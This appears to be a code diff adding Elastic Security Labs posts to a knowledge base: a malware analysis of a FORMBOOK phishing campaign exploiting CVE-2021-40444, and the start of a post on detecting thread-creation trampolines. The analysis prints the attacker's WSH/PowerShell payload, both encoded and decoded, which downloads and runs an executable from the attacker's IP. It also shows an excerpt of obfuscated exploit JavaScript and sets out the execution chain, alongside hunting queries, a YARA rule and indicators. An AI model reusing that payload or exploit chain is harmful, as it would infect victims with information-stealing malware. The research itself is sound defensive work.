+The decoded HTML entity was HTTP:\\104[.]244[.]78[.]177\Pope.txt. This provided us with another atomic indicator to add to the admin0011[@]issratech.com email address we’d previously collected, 104[.]244[.]78[.]177. Additionally, the decoded HTML entity revealed another file that could be of interest, Pope.txt.
+
+![Decoded HTML entity from the email attachment](/assets/images/formbook-adopts-cab-less-approach/decoded-html-entity-from-the-email-attachment.jpg)
+
+#### Pope.txt
+
+We retrieved a copy of Pope.txt from 104[.]244[.]78[.]177 and observed that it contained JavaScript code using variable renaming and string obfuscation. This JavaScript performs the following functions:
+
+- Downloads a Cabinet archive file called comres.cab from the same IP address but fails to extract it
+- Creates several [ActiveX objects](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/automat/activex-objects) (which are executable applications or libraries) to be loaded into the browser rendering engine
+- Uses the CVE-2021-40444 vulnerability with the ActiveX objects to perform directory traversal and execute a file called IEcache.inf. This filename is the [DLL loader](https://github.com/aslitsecurity/CVE-2021-40444_builders/blob/main/CVE-2021-40444/IEcache.inf) from the [ASL IT Security PoC code](https://github.com/aslitsecurity/CVE-2021-40444_builders/blob/main/CVE-2021-40444/IEcache.inf) and doesn’t exist in this test run
+
+![Obfuscated JavaScript file](/assets/images/formbook-adopts-cab-less-approach/obfuscated-javascript-file.jpg)
+
+The above figure shows the notable section of the obfuscated JavaScript code. We used a debugger to parse out the results of the lookup functions (shown commented out with //‘s). This revealed the classid (CLSID:edbc374c-5730-432a-b5b8-de94f0b57217) attribute which appears across the web in various other malware analyses of CVE-2021-40444. This suggests with moderate confidence that this JavaScript was crafted using some repurposed code that has been open-sourced. The classid attribute is used to determine if comres.cab has already been downloaded — if it has, it won’t attempt to download it again.
+
+Once comres.cab is downloaded and extracted, the extracted file must be located. This is why there are multiple directory execution attempts observed in JavaScript. All the work up to this point is to get the DLL (IEcache.inf) onto the filesystem. Finally, the DLL file would be executed as a control panel file (.cpl), because control panel files can be loaded as DLLs.
+
+![Elastic Analyzer showing attempts to execute IECache.inf](/assets/images/formbook-adopts-cab-less-approach/elastic-analyzer-showing-attempts-to-execute-iecache.jpg)
+
+#### Comres.cab and 1.doc.inf
+
+In our sample, comres.cab does not include the ASL IT Security PoC DLL (IEcache.inf). It included a file called 1.doc.inf.
+
+From comres.cab we used the file archive utility, 7-Zip, to extract 1.doc.inf. This file is interesting because it has the .inf ([setup information file](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files)) extension, but in using the file command, we can see that it is actually a DLL file, meaning that the file type is being obfuscated.
+
+```
+$ 7z e comres.cab
+7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
+p7zip Version 17.04 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)
+Scanning the drive for archives:
+1 file, 6060053 bytes (5919 KiB)
+Extracting archive: comres.cab
+--
+Path = comres.cab
+Type = Cab
+Physical Size = 6060053
+Method = None
+Blocks = 1
+Volumes = 1
+Volume Index = 0
+ID = 1234
+Everything is Ok
+Size:       4465152
+Compressed: 6060053
+
+$ file 1.doc.inf
+1.doc.inf: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
+```
+
+When analyzing the [import address table](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#import-address-table) (IAT) of 1.doc.inf, we observed multiple API functions, which would allow the file to download and execute additional files. Of particular note were the ShellExecuteExA and URLDownloadToFileW API functions.
+
+```
+=== IMPORTS ===
+MODULE_NAME      HINT   ORD  FUNCTION_NAME
+bcrypt.dll          0        BCryptSetProperty
+                    0        GetKeyState
+ADVAPI32.dll        0        RegDeleteKeyW
+SHELL32.dll         0        ShellExecuteExA
+urlmon.dll          0        URLDownloadToFileW
+WS2_32.dll                9
+ole32.dll           0        CoInitializeSecurity
+NETAPI32.dll        0        NetLocalGroupAddMembers
+OLEAUT32.dll              8
+PSAPI.DLL           0        GetModuleFileNameExW
+                    0        WTSSendMessageW
+                    0        GetProcessWindowStation
+                    0        LocalAlloc
+                    0        GetModuleFileNameW
+                    0        GetProcessAffinityMask
+                    0        SetProcessAffinityMask
+                    0        SetThreadAffinityMask
+                    0        Sleep
+                    0        ExitProcess
+                    0        FreeLibrary
+                    0        LoadLibraryA
+                    0        GetModuleHandleA
+                    0        GetProcAddress
+                    0        GetProcessWindowStation
+                    0        GetUserObjectInformationW
+```
+
+Through further analysis of the DLLs sections list, we identified that the file was protected with [VMProtect](https://vmpsoft.com/) (identified by the .vmp0, .vmp1, .vmp2, .vmp3 sections). “VMProtect protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze.”
+
+```
+$ pedump --sections 1.doc.inf | awk '{print $1, $2, $3, $4}'
+=== SECTIONS ===
+NAME    RVA    VSZ    RAW_SZ
+.text   1000   12ecd  0
+.rdata  14000  49ce   0
+.data   19000  1350d8 0
+.vmp1   14f000 2c70   0
+.vmp0   152000 fac    0
+.bss    153000 1000   0
+.vmp2   154000 38c0bb 0
+.vmp3   4e1000 5c6720 5c6800
+.reloc  aa8000 5b4    600
+```
+
+As we were unable to analyze the VMProtected file, we continued to explore other information that we’d previously collected. Specifically, we searched for additional samples that had been sent using the same admin0011[@]issratech.com email address. These parallel analyses identified additional samples and campaign phases, which we’re referring to as the Production and Generic phases.
+
+### Production phase
+
+The second, third, and fourth sightings all had the same sender field of admin0011[@]issratech.com and included a single attachment — Profile.rar file — to deliver the second stage malware.
+
+![Production phase lure email](/assets/images/formbook-adopts-cab-less-approach/production-phase-lure-email.jpg)
+
+#### Profile.rar
+
+Previously, we’ve highlighted files that have an extension that differs from their actual file type. To validate that the attachment is a RAR archive, we again use the file command to validate that it is a RAR archive.
+
+```
+$ file Profile.rar
+Profile.rar: data
+```
+
+The attachment has a RAR file extension, but instead of having a file type of RAR archive data, v5, it is raw data. Analysts who discover a file containing raw data can use the less command to dump the file contents to STDOUT to directly inspect what may be inside.
+
+```
+$ less Profile.rar
+<job><script language=vbs>Set WshShell = WScript.CreateObject("WScript.Shell")
+runCmd = "POwErshell -noprofile -noni -W Hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADQANAAuADcAOAAuADEANwA3AC8AYQBiAGIAMAAxAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAZABsAGwAaABvAHMAdABTAHYAYwAuAGUAeABlACIAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAZABsAGwAaABvAHMAdABTAHYAYwAuAGUAeABlACIA"
+WshShell.Run "cmd /c " & runCmd, 0, True</script></job> Rar!...truncated...
+```
+
+The raw data includes a script job element that can be natively interpreted by the Windows Script Host (WSH). The job element directs WSH to spawn a shell that spawns a hidden PowerShell process which then runs a Base64 encoded PowerShell script. However, the script job element needs to be executed, which isn’t done by double-clicking on the file.
+
+Decoding this string, we can see that a file called abb01.exe is downloaded and executed from 104[.]244[.]78[.]177. This is the same IP address we have observed across all Testing and Production phases.
+
+```
+echo "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADQANAAuADcAOAAuADEANwA3AC8AYQBiAGIAMAAxAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAZABsAGwAaABvAHMAdABTAHYAYwAuAGUAeABlACIAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAZABsAGwAaABvAHMAdABTAHYAYwAuAGUAeABlACIA"\ | base64 -D
+iex ((new-object system.net.webclient).downloadfile(“http://104[.]244[.]78[.]177/abb01.exe”,”$env:LOCALAPPDATA\dllhostSvc.exe”));Start-Process “$env:LOCALAPPDATA\dllhostSvc.exe”
+```
+
+We'll continue to explore this file to identify how the script job is executed. As we displayed above, the file still has the Rar! header, so we can decompress this archive. First, we'll use the unrar program with the e switch to decompress the RAR archive and retrieve the contents: document.docx.
+
+```
+$ unrar e Profile.rar
+Extracting from Profile.rar
+Extracting  document.docx                                             OK
+All OK
+```
+
+#### document.docx
+
+While Profile.rar appears to be a compressed archive, the PowerShell script won’t download and execute abb01.exe automatically upon decompressing it. To execute that script, the compressed document within Profile.rar, document.docx, must be opened.
+
+Using the same technique as we highlighted in the Testing phase, we decompressed document.docx and examined the document relationship file (word/\_rels/document.xml.rels). As previously described, we observed a remote OLE object stored and formatted as an HTML entity code block that we can decode using CyberChef.
+
+![Decoded document.docx HTML entities](/assets/images/formbook-adopts-cab-less-approach/decoded-document_docx-html-entities.jpg)
+
+We see the same IP address, 104[.]244[.]78[.]177 and a new filename called Profile.html.
+
+#### Profile.html
+
+Based on the HTML code, this initially appeared to be an Apache landing page. However, closer inspection identified another obfuscated JavaScript towards the bottom of the page.
+
+```
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>
+<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
+<!--
+        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+                This file is generated from xml source: DO NOT EDIT
+        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+        -->
+<title>Getting Started - Apache HTTP Server Version 2.5</title>
+...truncated…
+<script>function a(){var l=['wexcKvyUWOi','ntu3ndaWmeHNC0HOsq','nfPrsujOwG','amohWRqfW5xcNSk/r23cO8kClG','
+iSkfW5hcTSk4jmk4xmk2W73dSCkjWOq','ndCXnZeXDLf1tKLj','WRSYCcCZzmkmaW','WQzEqb5xWOldVWXBgSkSWRyp','AhrTBgzPBgu',
+'W5tdO1L3WOFdISk8W50','u2nYAxb0','lNDZzJOUlI8UlI8UlI9ezxnRDg9Wl1bYB2zPBguUCMfYpY53C2y','iCkEW592W77cNa',
+'WReLW5ddJGiJWRhcRMuYW40LW4v9xSkJWRNcObFdLSkEW5hcMe1kW4JcHL84W7WgWPtcNt4eW4NcP8oZy8kN',
+'lNDZzJOUlI8UlI9eB3DUBg9HzhmVuhjVzMLSzs5Yyxi/lNDZzG','ndaWmtu5BvbZqxHH','Bg9JyxrPB24',
+'ex3cTSkNW5z+w2RcKGhdLs/dNbBdImoknSk1FwVdQL/cVSkWWRC9WPldO3/dRLv5lt5lW4XFWRVcGWxcNsiX','nZa3mZKWnNP1zffirq',
+'bxy1yvlcHujyqSkly2ldHvDrW5vJW7HQW5mZimkKWPJcQJClD0j3WO5SW6KTqmozaWOzACoc','mtKXmZq5mLbREgPOqW','W73dMrjjW53cQaBcVq',
+...truncated…
+ActiveXObject(j(0x144))[k(0x13c,'k0X5')][j(0x14c)]=k(0x14d,'[Otp'),new ActiveXObject('htmlfile')[j(0x146)]['location']=j(0x14a),new ActiveXObject('htmlfile')[k(0x148,
+'MCjf')][k(0x138,'kZYE')]=j(0x147),new ActiveXObject(j(0x144))[j(0x146)][k(0x142,'Lz1J')]=k(0x14f,'BiKg'),new ActiveXObject(k(0x145,'h]@1'))[j(0x146)][j(0x14c)]=k(0x13a,'!v$V'));</script>
+```
+
+Deobfuscating the JavaScript using the same debugger as before, we can see several ActiveXObjects. This time, however, there are far fewer and the execution is more prescripted, eliminating useless calls. This shows a refinement from before. This newer code also uses a .wsf extension instead of the previous .cpl. This allows the exploit to use the Windows Scripting Host to execute code. This is the same directory traversal technique we observed in the Testing phase. However, this time the JavaScript is looking for the Profile.rar file (whereas in the Testing phase, it was looking for IECache.inf) and attempting to execute the PowerShell script, which was prepended in Profile.rar as a Windows Script File (.wsf).
+
+![Deobfuscated JavaScript showing directory search for the original RAR file](/assets/images/formbook-adopts-cab-less-approach/deobfuscated-javascript-showing-directory-search-for-the-original-rar-file.jpg)
+
+#### Dropper
+
+As we illustrated above, Profile.rar has a prepended Base64 encoded PowerShell command which downloads abb01.exe. The JavaScript from Profile.html attempts to execute this PowerShell code within Profile.rar as a Windows Script File.
+
+abb01.exe is a dropper that when dynamically executed, drops another PE file, yxojzzvhi0.exe in our example.
+
+#### FORMBOOK Binary
+
+yxojzzvhi0.exe was scanned with Elastic YARA rules and identified to be a variant of [FORMBOOK](https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook), based on unique byte sequences.
+
+FORMBOOK, also known as XLOADER, is an information stealer that includes keyloggers, clipboard copiers, and form grabber components to collect and exfiltrate sensitive information. This malware has been [offered as-a-service](https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I) for over five years and remains a successful tool for stealing information.
+
+### Generic phase
+
+On October 28 and November 8, 2021, we observed additional sightings but used a generic phishing attachment tactic to load FORMBOOK. Additionally, we were able to collect some information from the email header that we’ll discuss in the Campaign Analysis section.
+
+![Generic phase lure email](/assets/images/formbook-adopts-cab-less-approach/generic-phase-lure-email.jpg)
+
+These sightings all have two RAR attachments. One of the attachments has a .rar file extension and the other has either a .gz or .7z extension. We’ll explore one of the sightings below.
+
+```
+$ file D2110-095.gz DWG.rar
+D2110-095.gz: RAR archive data, v5
+DWG.rar:      RAR archive data, v5
+```
+
+The RAR files contained two PE files. They were identical instances of a very [common FORMBOOK variant](https://www.virustotal.com/gui/file/4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096/detection).
+
+```
+$ omnihash DWG.exe D2110-095.exe
+Hashing file DWG.exe
+    MD5:    ff882802d113ed02fa070c496f89d797
+    SHA1:   aad1eed1c53f1d33ab52e13442b036bfeee91f1b
+    SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
+Hashing file D2110-095.exe
+    MD5:    ff882802d113ed02fa070c496f89d797
+    SHA1:   aad1eed1c53f1d33ab52e13442b036bfeee91f1b
+    SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
+```
+
+## Campaign analysis
+
+While researching this FORMBOOK campaign, we observed infrastructure reuse and tooling similarities during testing and operational phases, which we believe represent a single campaign.
+
+![Campaign artifact associations](/assets/images/formbook-adopts-cab-less-approach/artifact-associations.jpg)
+
+### Email header
+
+Throughout all sightings, the campaign used similar sending email addresses:
+
+- admin0011[@]issratech.com
+- admin010[@]backsjoy.com
+- admin012[@]leoeni.com
+
+Additionally, across the Production and Generic phases of the campaign, we observed the X-Mailer element (the software identifier set by the sending email client) as RainLoop/1.16.0. RainLoop is an open-source email client. It should be noted that in our collection, one sighting had some header information sanitized before being uploaded to VirusTotal. RainLoop could have been referenced in this sighting, but we were not able to confirm that.
+
+### File hashes
+
+Across the Production phase, we were able to identify code sharing through the use of the same attachment (Profile.rar).
+
+### IP addresses
+
+Across the Testing and Production phases, we observed that 104[.]244[.]78[.]177 was used for all elements of the campaigns. This IP address was used to host archives, implants, and scripts.
+
+### Resource development
+
+As research progressed, we observed activities we believed were capability testing. This activity was observed one time and used artifacts ([IEcache.inf](https://github.com/aslitsecurity/CVE-2021-40444_builders/blob/main/CVE-2021-40444/IEcache.inf), [document.xml.rels](https://raw.githubusercontent.com/aslitsecurity/CVE-2021-40444_builders/main/CVE-2021-40444/source/doc/word/_rels/document.xml.rels)) from a public CVE-2021-40444 exploit proof-of-concept [repository](https://github.com/aslitsecurity/CVE-2021-40444_builders). Other phases included custom exploit code that differed from the PoC code but shared [initial access](https://attack.mitre.org/techniques/T1566/001) and [execution](https://attack.mitre.org/techniques/T1203) TTPs as well as the same network infrastructure.
+
+We observed that the issratech[.]com, backsjoy[.]com, and leoeni[.]com domains own TLS certificates provided by Let’s Encrypt. While the steps of creating a TLS certificate are not overly cumbersome, the fact that the domain owner went through the preparatory process of creating a certificate could indicate that these domains are intended to be used for future encrypted operations.
+
+In the Generic phase, the campaign abandoned the MSHTML exploit and attempted to leverage a traditional phishing malware-attachment approach. This shift in tactics is possibly because successful exploit patching rendered the vulnerability ineffective.
+
+### Victimology
+
+We observed that of the four companies targeted by this campaign, all were in the manufacturing vertical. Threat actors utilizing FORMBOOK have been observed targeting the manufacturing vertical [in the past](https://threatpost.com/formbook-malware-targets-us-defense-contractors-aerospace-and-manufacturing-sectors/128334/). The companies all had international footprints in:
+
+- Industrial Materials, Aluminum extrusion, HQ in Germany (Testing phase)
+- Industrial Conglomerate, Industrial Chemicals, HQ in South Korea (Production phase)
+- Industrial Manufacturing Products and Consulting, HQ in Switzerland (Generic phase)
+- Industrial Mechanical Engineering and Manufacturing, HQ in Germany (Generic phase)
+
+While the targeted companies are of note (in that they are in the same vertical), an email address domain observed in all three phases — issratech[.]com, appears similar to a legitimate Jamaican company domain, isratech[.]com (notice the difference between one and two s's), a business that specializes in irrigation, wastewater management, and solar energy. Below, is a screenshot of issratech[.]com using the default CyberPanel landing page. CyberPanel is a web hosting tool for WordPress sites.
+
+![Issratech landing page](/assets/images/formbook-adopts-cab-less-approach/issratech-landing-page.jpg)
+
+Each targeted company of the admin0011[@]issratech.com email address have expertise or products that could have been valuable to an Isratch project listed on their projects page (`https://www.isratech[.]com/projects/`):
+
+- Chemical: Waste-water treatment, dairy production sanitation
+- Extruded aluminum: Solar array scaffolding, greenhouses
+
+Two additional email address domains were observed in the Generic phase — one appears to be mimicking a legitimate medical equipment manufacturer (backjoy[.]com) and the other (leonei[.]com) appears to be adversary controlled, but seemingly not being used for legitimate purposes.
+
+> leonei[.]com is protected by a Denial-of-Service protection service, so their domain IP address likely represents multiple legitimate domains and any blocking of the&nbsp;leonei[.]com IP address from the indicator table should be carefully measured.
+
+It is possible, but not confirmed, that the recipients of the phishing emails in all phases are from a list of email addresses in the manufacturing vertical. These email lists are commonly available for purchase to enable sales, marketing, and business-to-business (B2B) efforts but can also be used for phishing campaigns.
+
+## Tactics
+
+Using the MITRE ATT&CK® framework, tactics represent the why of a technique or sub technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+Observed tactics:
+
+- Resource development
+- Initial access
+- Execution
+
+## Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+Observed techniques/sub techniques
+
+- Acquire infrastructure - server
+- Obtain capabilities - malware and exploits
+- Stage capabilities - upload malware
+- Phishing - attachment
+- Command and scripting interpreter - PowerShell
+- Exploitation for client execution
+
+## Detections
+
+### Hunting queries
+
+These queries can be used in Kibana’s Security → Timelines → New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.
+
+This query will identify the CVE-2021-40444 exploit attempt from a malicious Access, Publisher, PowerPoint, or Word document.
+
+```
+process where event.type in ("start", "process_started") and process.parent.name : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe") and process.command_line :
+            ("*../../..*",
+            "*..\\..\\*",
+            "*cpl:..*",
+            "*hta:..*",
+            "*js:..*",
+            "*jse:..*",
+            "*sct:..*",
+            "*vbs:..*",
+            "*wsf:..*")
+```
+
+![Hunt query identifies CVE-2021-40444 exploit using Timelines](/assets/images/formbook-adopts-cab-less-approach/hunt-query-identifies-cve-2021-40444-exploit-using-timelines.jpg)
+
+### YARA rule
+
+We have created a YARA rule to identify this FORMBOOK activity.
+
+```
+rule Windows_Trojan_FORMBOOK {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2021-06-14"
+        last_modified = "2021-08-23"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "FORMBOOK"
+        threat_name = "Windows.Trojan.FORMBOOK"
+        reference_sample = "6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a"
+    strings:
+        $a1 = { 3C 30 50 4F 53 54 74 09 40 }
+        $a2 = { 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 }
+        $a3 = { 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 }
+        $a4 = { 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 }
+    condition:
+        any of them
+}
+```
+
+## Defensive Recommendations
+
+The following steps can be leveraged to improve a network’s protective posture:
+
+1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat
+2. Review and ensure that you have deployed the latest Microsoft Security Updates
+3. Maintain backups of your critical systems to aid in quick recovery
+
+## References
+
+The following research was referenced throughout the document:
+
+- [https://nvd.nist.gov/vuln/detail/CVE-2021-40444](https://nvd.nist.gov/vuln/detail/CVE-2021-40444)
+- [https://twitter.com/vxunderground/status/1436326057179860992?s=20](https://twitter.com/vxunderground/status/1436326057179860992?s=20)
+- [https://github.com/lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444)
+- [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444)
+- [https://github.com/aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders)
+- [https://github.com/klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444)
+- [https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/](https://kentosec.com/2021/09/12/cve-2021-40444-poc-demonstration/)
+- [https://github.com/Edubr2020/CVE-2021-40444–CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless)
+- [https://twitter.com/vxunderground/status/1436326057179860992?s=20](https://twitter.com/vxunderground/status/1436326057179860992?s=20)
+- [https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I](https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I)
+
+## Indicators
+
+| Indicator                                                        | Type        | Reference from blog   | Note                                 |
+| ---------------------------------------------------------------- | ----------- | --------------------- | ------------------------------------ |
+| 70defbb4b846868ba5c74a526405f2271ab71de01b24fbe2d6db2c7035f8a7df | SHA256      | Request Document.docx | Testing phase email attachment       |
+| 7c98db2063c96082021708472e1afb81f3e54fe6a4a8b8516e22b3746e65433b | SHA256      | comres.cab            | Testing phase CAB archive            |
+| 363837d5c41ea6b2ff6f6184d817c704e0dc5749e45968a3bc4e45ad5cf028d7 | SHA256      | 1.doc.inf             | Testing phase VMProtect DLL          |
+| 22cffbcad42363841d01cc7fef290511c0531aa2b4c9ca33656cc4aef315e723 | SHA256      | IEcache.inf           | Testing phase DLL loader             |
+| e2ab6aab7e79a2b46232af87fcf3393a4fd8c4c5a207f06fd63846a75e190992 | SHA256      | Pope.txt              | Testing phase JavaScript             |
+| 170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6 | SHA256      | Profile.rar           | Production phase email attachment    |
+| d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72 | SHA256      | document.docx         | Production phase compressed document |
+| 776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2 | SHA256      | abb01.exe             | Production phase dropper             |
+| 95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82 | SHA256      | Profile.html          | Production phase JavaScript          |
+| bd1c1900ac1a6c7a9f52034618fed74b93acbc33332890e7d738a1d90cbc2126 | SHA256      | yxojzzvhi0.exe        | FORMBOOK malware                     |
+| 0c560d0a7f18b46f9d750e24667721ee123ddd8379246dde968270df1f823881 | SHA256      | DWG.rar               | Generic phase email attachment       |
+| 5a1ef64e27a8a77b13229b684c09b45a521fd6d4a16fdb843044945f12bb20e1 | SHA256      | D2110-095.gz          | Generic phase email attachment       |
+| 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096 | SHA256      | D2110-095.exe DWG.exe | FORMBOOK malware                     |
+| admin0011[@]issratech.com                                        | email-addr  |                       | Phishing sending email address       |
+| admin010[@]backsjoy.com                                          | email-addr  |                       | Phishing sending email address       |
+| admin012[@]leoeni.com                                            | email-addr  |                       | Phishing sending email address       |
+| issratech[.]com                                                  | domain-name |                       | Adversary controlled domain          |
+| backsjoy[.]com                                                   | domain-name |                       | Adversary controlled domain          |
+| leonei[.]com                                                     | domain-name |                       | Adversary controlled domain          |
+| 2[.]56[.]59[.]105                                                | ipv4-addr   |                       | IP address of issratech[.]com        |
+| 212[.]192[.]241[.]173                                            | ipv4-addr   |                       | IP address of backsjoy[.]com         |
+| 52[.]128[.]23[.]153                                              | ipv4-addr   |                       | IP address of leonei[.]com           |
+| 104[.]244[.]78[.]177                                             | ipv4-addr   |                       | Adversary controlled IP address      |
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4f6fe2c619b93195/628e88d930bc9653db3af066/formbook-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/get_injectedthreadex_detection_thread_creation_trampolines.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/get_injectedthreadex_detection_thread_creation_trampolines.md
new file mode 100644
index 0000000000000..1f78eddeca184
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/get_injectedthreadex_detection_thread_creation_trampolines.md
@@ -0,0 +1,220 @@
+---
+title: "Get-InjectedThreadEx – Detecting Thread Creation Trampolines"
+slug: "get-injectedthreadex-detection-thread-creation-trampolines"
+date: "2022-12-07"
+description: "In this blog, we will demonstrate how to detect each of four classes of process trampolining and release an updated PowerShell detection script – Get-InjectedThreadEx"
+author:
+  - slug: john-uhlmann
+image: "photo-edited-02-e.jpg"
+category:
+  - slug: security-research
+tags:
+  - windows internals
+  - process injection
+  - defense evasion
+---
+
+The prevalence of [memory resident malware](https://www.elastic.co/blog/hunting-memory) remains extremely high. Defenders have imposed significant costs on file-based techniques, and malware must typically utilize [in-memory techniques](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) to avoid detection. In Elastic's recently-published [Global Threat Report](https://t.co/3PZDENisXK), defense evasion is the most diverse tactic we observed and represents an area of rapid, continuous innovation.
+
+It is convenient, and sometimes necessary, for memory-resident malware to create its own threads within its surrogate process. Many such threads can be detected with relatively low noise by identifying those which have a start address not backed by a Portable Executable (PE) image file on disk. This detection technique was originally conceived by Elastic's [Gabriel Landau](https://twitter.com/GabrielLandau) and Nicholas Fritts for the Elastic Endgame product. Shortly thereafter, it was released as a PowerShell script for the benefit of the community in the form of [Get-InjectedThread](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) with the help of [Jared Atkinson](https://twitter.com/jaredcatkinson) and Elastic's [Joe Desimone](https://twitter.com/dez_) at the [2017 SANS Threat Hunting and IR Summit](https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory).
+
+At a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.
+
+![Virtual Memory layout of a simple process using Sysinternal’s VMMap. Purple regions are image-backed and it is normal for threads to start there.](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image13.png)
+
+However, an adversary often has sufficient control to create a thread with an image-backed start address which will subsequently transfer execution to their unbacked memory. When this transfer is done immediately, it is known as a “trampoline” as you are quickly catapulted somewhere else.
+
+There are four broad classes of trampolines – you can build your own from scratch, you can use an illusionary trampoline, you can repurpose something else as a trampoline, or you can simply find an existing trampoline.
+
+In other words - hooks, hijacks, gadgets and functions.
+
+Each of these will bypass our original unbacked executable memory heuristic.
+
+I highly recommend these two excellent blogs as background:
+
+- [Understanding and Evading Get-InjectedThread](https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/) by Adam Chester.
+- [Avoiding Get-InjectedThread for Internal Thread Creation](https://www.trustedsec.com/blog/avoiding-get-injectedthread-for-internal-thread-creation/) by Christopher Paschen.
+
+In this blog, we will demonstrate how to detect each of these classes of bypass and release an updated PowerShell detection script – [Get-InjectedThreadEx](https://github.com/jdu2600/Get-InjectedThreadEx).
+
+## CreateThread() overview
+
+As a quick recap, the Win32 [CreateThread()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) API lets you specify a pointer to a desired StartAddress which will be used as the entrypoint of a function that takes exactly one user-provided parameter.
+
+![Microsoft documentation for the CreateThread API](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image8.png)
+
+So, CreateThread() is effectively a simple shellcode runner.
+
+![CreateThread == RunShellcode](/assets/images/get-injectedthreadex-detection-thread-creation-trampolines/image6.png)
+
+And its sibling, [CreateRemoteThread()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) is effectively remote process injection.
+
